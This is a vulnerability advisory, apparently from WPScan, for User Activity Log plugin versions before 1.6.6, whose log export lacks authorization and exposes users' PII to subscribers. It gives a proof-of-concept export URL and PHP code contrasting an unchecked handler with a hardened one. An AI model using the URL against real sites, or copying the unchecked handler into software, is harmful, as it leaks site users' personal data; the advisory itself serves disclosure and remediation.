wpvulndb | Daniel Ruf | WPVDB-ID: DB3E4336-117C-47F2-9B43-2CA115525297
History: Aug 09, 2023 - 12:00 a.m.

User Activity Log < 1.6.6 - Subscriber+ Log Export

Published: 2023-08-09 00:00:00
Author: Daniel Ruf
Source: wpscan.com
Tags: plugin, data breach, authorization, subscriber, pii, url, security vulnerability

AI Score: 4.5 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.0%)

Description: The plugin lacks proper authorisation when exporting its activity logs, allowing any authenticated user, such as a subscriber, to perform the export and retrieve PII such as email addresses.

PoC

As a subscriber, open the following URL: https://example.com/wp-admin/admin-post.php?page=user_action_log&export=user_logs&logformat=csv&userrole&dateshow&username&type&showip&txtsearch&export-nonce=aaa
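The advisory describes the root cause (an export handler reachable by any logged-in user, with a nonce that is never verified) but shows no code. The following PHP is an added illustration and is not the User Activity Log plugin's own code: it contrasts an unchecked admin-post export handler with a hardened one that requires an administrative capability and a valid nonce. The function names, the `admin_post_ual_export_logs` hook, the `manage_options` capability and the sample log rows are all assumptions made for the example.

```php
<?php
// Added illustration only; not code from the plugin or the advisory.
// Function names, hook name, capability and sample data are assumptions.

// Constructed sample rows standing in for whatever the plugin stores.
function ual_fetch_logs() {
    return array(
        array( 'username' => 'alice', 'email' => 'alice@example.invalid', 'ip' => '203.0.113.10', 'action' => 'login' ),
        array( 'username' => 'bob',   'email' => 'bob@example.invalid',   'ip' => '198.51.100.7', 'action' => 'logout' ),
    );
}

// Streams the rows as CSV. Once this runs, the PII has left the server,
// so every authorization decision has to happen before this call.
function ual_stream_csv( array $rows ) {
    header( 'Content-Type: text/csv' );
    header( 'Content-Disposition: attachment; filename="user_logs.csv"' );
    $out = fopen( 'php://output', 'w' );
    fputcsv( $out, array( 'username', 'email', 'ip', 'action' ) );
    foreach ( $rows as $row ) {
        fputcsv( $out, $row );
    }
    fclose( $out );
}

// Vulnerable shape (what the advisory describes): being logged in at all is
// enough, and the export-nonce parameter is read by nobody, so a subscriber
// requesting export=user_logs receives the full CSV.
function ual_export_logs_unchecked() {
    if ( isset( $_GET['export'] ) && 'user_logs' === $_GET['export'] ) {
        ual_stream_csv( ual_fetch_logs() );
        exit;
    }
}

// Hardened shape: fail closed unless the caller holds an administrative
// capability AND presents a nonce minted for this action.
function ual_export_logs_checked() {
    if ( ! isset( $_GET['export'] ) || 'user_logs' !== $_GET['export'] ) {
        return;
    }
    // Capability check: subscribers do not have manage_options, so the
    // request in the PoC stops here with a 403.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to export activity logs.', 'user-activity-log' ), 403 );
    }
    // Nonce check: check_admin_referer() dies on a missing or forged value
    // (e.g. export-nonce=aaa) and on cross-site forged links.
    check_admin_referer( 'ual_export_logs', 'export-nonce' );
    ual_stream_csv( ual_fetch_logs() );
    exit;
}

// Only the privileged admin_post_ hook is registered; no admin_post_nopriv_
// variant, so unauthenticated requests never reach the handler at all.
add_action( 'admin_post_ual_export_logs', 'ual_export_logs_checked' );

// The matching export link in the admin UI would be built with
// wp_nonce_url( admin_url( 'admin-post.php?action=ual_export_logs&export=user_logs' ),
//               'ual_export_logs', 'export-nonce' );
```

The two checks are deliberately independent: the capability check is the authorization fix the advisory calls for, while the nonce check only defends against forged links and would not by itself stop a subscriber who can obtain a valid nonce from a page they are allowed to view. Relying on the nonce alone is the mistake that leaves exports like this exposed.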

CPE: Name (none listed) | Operator: eq | Version: 1.6.6
